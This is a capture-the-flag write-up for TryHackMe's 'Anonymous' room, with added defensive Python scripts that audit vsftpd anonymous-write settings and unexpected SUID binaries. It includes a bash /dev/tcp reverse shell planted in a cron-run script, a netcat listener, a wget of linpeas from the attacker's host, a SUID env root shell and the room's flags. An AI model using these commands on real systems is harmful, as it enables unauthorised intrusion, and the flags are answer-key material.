Anonymous – a tryhackme.com writeup

A fairly minimalistic CTF from tryhackme.com – let's dive right in:

What does nmap say?

sudo nmap -sV 10.10.51.126

There we have the first answers to the challenge: four services are running, among them FTP on 21 and SMB on 139 and 445.

Now we need to look at the smb shares:

smbclient -L 10.10.51.126

Next answer: the share we are looking for is pics.

Now we are looking for the flags.

Let’s see what ftp can do for us.

ftp 10.10.51.126

Anonymous login works.

That looks good: 3 files, we can read all of them and write to the shell script. Let's download them and look into them.

get clean.sh
get removed_files.log
get to_do.txt

to_do.txt only tells us that the admin is planning to block anonymous access. Good idea, but it doesn't help us here.
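The note in to_do.txt is exactly the fix the box needs. As an added example (not part of the writeup, and assuming the daemon is vsftpd, which the room does not state), here is a small audit that parses a vsftpd configuration and reports whether anonymous users can log in and write; the weak and hardened configurations are constructed for the demo:

```python
"""Audit a vsftpd configuration for anonymous write access.

Added example for this writeup, not code from the room or from vsftpd itself.
Assumption: the FTP service is vsftpd (the writeup does not name the daemon);
the two configuration texts below are constructed for the demo.
"""

# vsftpd directives that grant anonymous write access (names from vsftpd.conf(5)).
ANON_WRITE_KEYS = (
    "anon_upload_enable",       # anonymous STOR (uploads / overwrites)
    "anon_mkdir_write_enable",  # anonymous MKD
    "anon_other_write_enable",  # anonymous DELE, RNFR/RNTO, SITE CHMOD ...
)

# Constructed: the kind of configuration that lets an anonymous user replace clean.sh.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
local_enable=NO
write_enable=YES
anon_upload_enable=YES
anon_other_write_enable=YES
anon_root=/var/ftp
"""

# Constructed: anonymous access disabled, as the to_do.txt note on the box intends.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
"""


def parse_vsftpd_conf(text):
    """Parse key=value lines into a dict; comments and blank lines are ignored."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip().lower()] = value.strip().upper()
    return conf


def anonymous_write_findings(conf):
    """Return human-readable findings about anonymous access.

    Defaults mirror vsftpd.conf(5): anonymous_enable defaults to YES,
    write_enable and the anon_*_enable keys default to NO.
    """
    findings = []
    if conf.get("anonymous_enable", "YES") != "YES":
        return findings  # no anonymous login at all
    findings.append("anonymous_enable=YES: unauthenticated FTP logins are accepted")
    if conf.get("write_enable", "NO") != "YES":
        return findings  # anonymous users can read but never write
    for key in ANON_WRITE_KEYS:
        if conf.get(key, "NO") == "YES":
            findings.append(f"{key}=YES together with write_enable=YES: anonymous users can modify files")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, anonymous_write_findings(parse_vsftpd_conf(text)))
```

Run it against /etc/vsftpd.conf on a host you administer; anything beyond an empty list for a server that is not meant to be a public drop box deserves a look.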

So let's cat removed_files.log:

cat removed_files.log

Not too interesting either.

Let’s move on to the bash script.

cat clean.sh

Now things are beginning to make sense.

clean.sh writes into removed_files.log. Knowing that there were a lot of lines in the log file, we can assume that clean.sh is called automatically and periodically by a cron job.

We also know that we can write to the file. So let's just plant a reverse shell into that script, set up netcat on our side and see if we get a shell when the cron job on the target eventually fires.

#!/bin/bash
exec 5<>/dev/tcp/10.11.30.88/1234
cat <&5 | while read line; do $line 2>&5 >&5; done

And in our ftp session:

put clean.sh clean.sh

On our local machine we start our usual netcat listener:

nc -l 1234

and wait …

And here we go. Let’s look around.

whoami
pwd
ls -la

We found the user flag

90d6f992585815ff991e68748c414740

To get ideas on how to become root let’s use linpeas.

We start a web server locally and transfer the file to our target.

So on our local machine:

python3 -m http.server

And on the target machine:

wget http://10.11.30.88:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

In the SUID section we find this line:

-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env

With this we find something on GTFOBins:

https://gtfobins.github.io/gtfobins/env/#suid

From there we use

env /bin/sh -p

and we are root.

whoami
root
cat /root/root.txt

So our root flag is

4d930091c31a622a7ed10f27999af363
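The privilege escalation works only because /usr/bin/env carries the SUID bit, which it never needs. As an added example (not code from the room, linpeas or GTFOBins), here is a review script that parses an ls -l style listing such as the one linpeas prints, skips a baseline of binaries that legitimately run SUID, and flags everything else, with a higher severity for program names known to spawn a shell. The baseline and the shell-capable list are hypothetical and partial (GTFOBins, linked above, is the reference); the listing in demo() is constructed and includes the env line from this writeup.

```python
"""Review SUID-root binaries from an ls -l style listing and flag the
unexpected ones.

Added example for the privilege-escalation step above; not code from the
room, linpeas or GTFOBins. EXPECTED_SUID and SHELL_CAPABLE are hypothetical,
partial lists; the listing in demo() is constructed.
"""
import os

# Binaries that normally carry the SUID bit on a Debian/Ubuntu host (partial baseline; hypothetical).
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/usr/bin/su",
    "/bin/mount", "/bin/umount", "/usr/bin/newgrp", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/bin/ping",
}

# Program names that can hand the caller a shell when run with SUID root
# (a few entries from GTFOBins; partial on purpose).
SHELL_CAPABLE = {"env", "bash", "sh", "dash", "find", "vim", "python", "python3", "perl", "awk"}


def parse_ls_line(line):
    """Parse one 'ls -l' / linpeas line into a dict, or return None."""
    fields = line.split(None, 8)  # perms links owner group size month day year/time path
    if len(fields) < 9:
        return None
    perms, owner, path = fields[0], fields[2], fields[8].strip()
    return {
        "path": path,
        "owner": owner,
        "setuid": perms[3] in "sS",  # 's' = setuid+exec, 'S' = setuid without exec
        "setgid": perms[6] in "sS",
    }


def audit_suid(lines, expected=EXPECTED_SUID, shell_capable=SHELL_CAPABLE):
    """Return (severity, path, remediation) for SUID-root files outside the baseline."""
    findings = []
    for line in lines:
        entry = parse_ls_line(line)
        if entry is None or not entry["setuid"] or entry["owner"] != "root":
            continue
        if entry["path"] in expected:
            continue
        name = os.path.basename(entry["path"])
        severity = "high" if name in shell_capable else "review"
        findings.append((severity, entry["path"], f"chmod u-s {entry['path']}"))
    return findings


def demo():
    # Constructed listing: the env line is the one linpeas printed in the writeup.
    listing = [
        "-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env",
        "-rwsr-xr-x 1 root root 59K Jan 25 2018 /usr/bin/passwd",
        "-rwxr-xr-x 1 root root 1.1M Apr 4 2018 /bin/bash",
        "-rwsr-xr-x 1 root root 40K Jun 2 2019 /usr/local/bin/backup",
        "-rwsr-xr-x 1 backup backup 12K Jun 2 2019 /opt/tool",
    ]
    return audit_suid(listing)


if __name__ == "__main__":
    for severity, path, fix in demo():
        print(f"[{severity}] {path}  (fix: {fix})")
```

On a live host, feed it the output of `find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null`; the baseline should be replaced with what the distribution's packages actually ship, for example by diffing against a freshly installed reference system.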
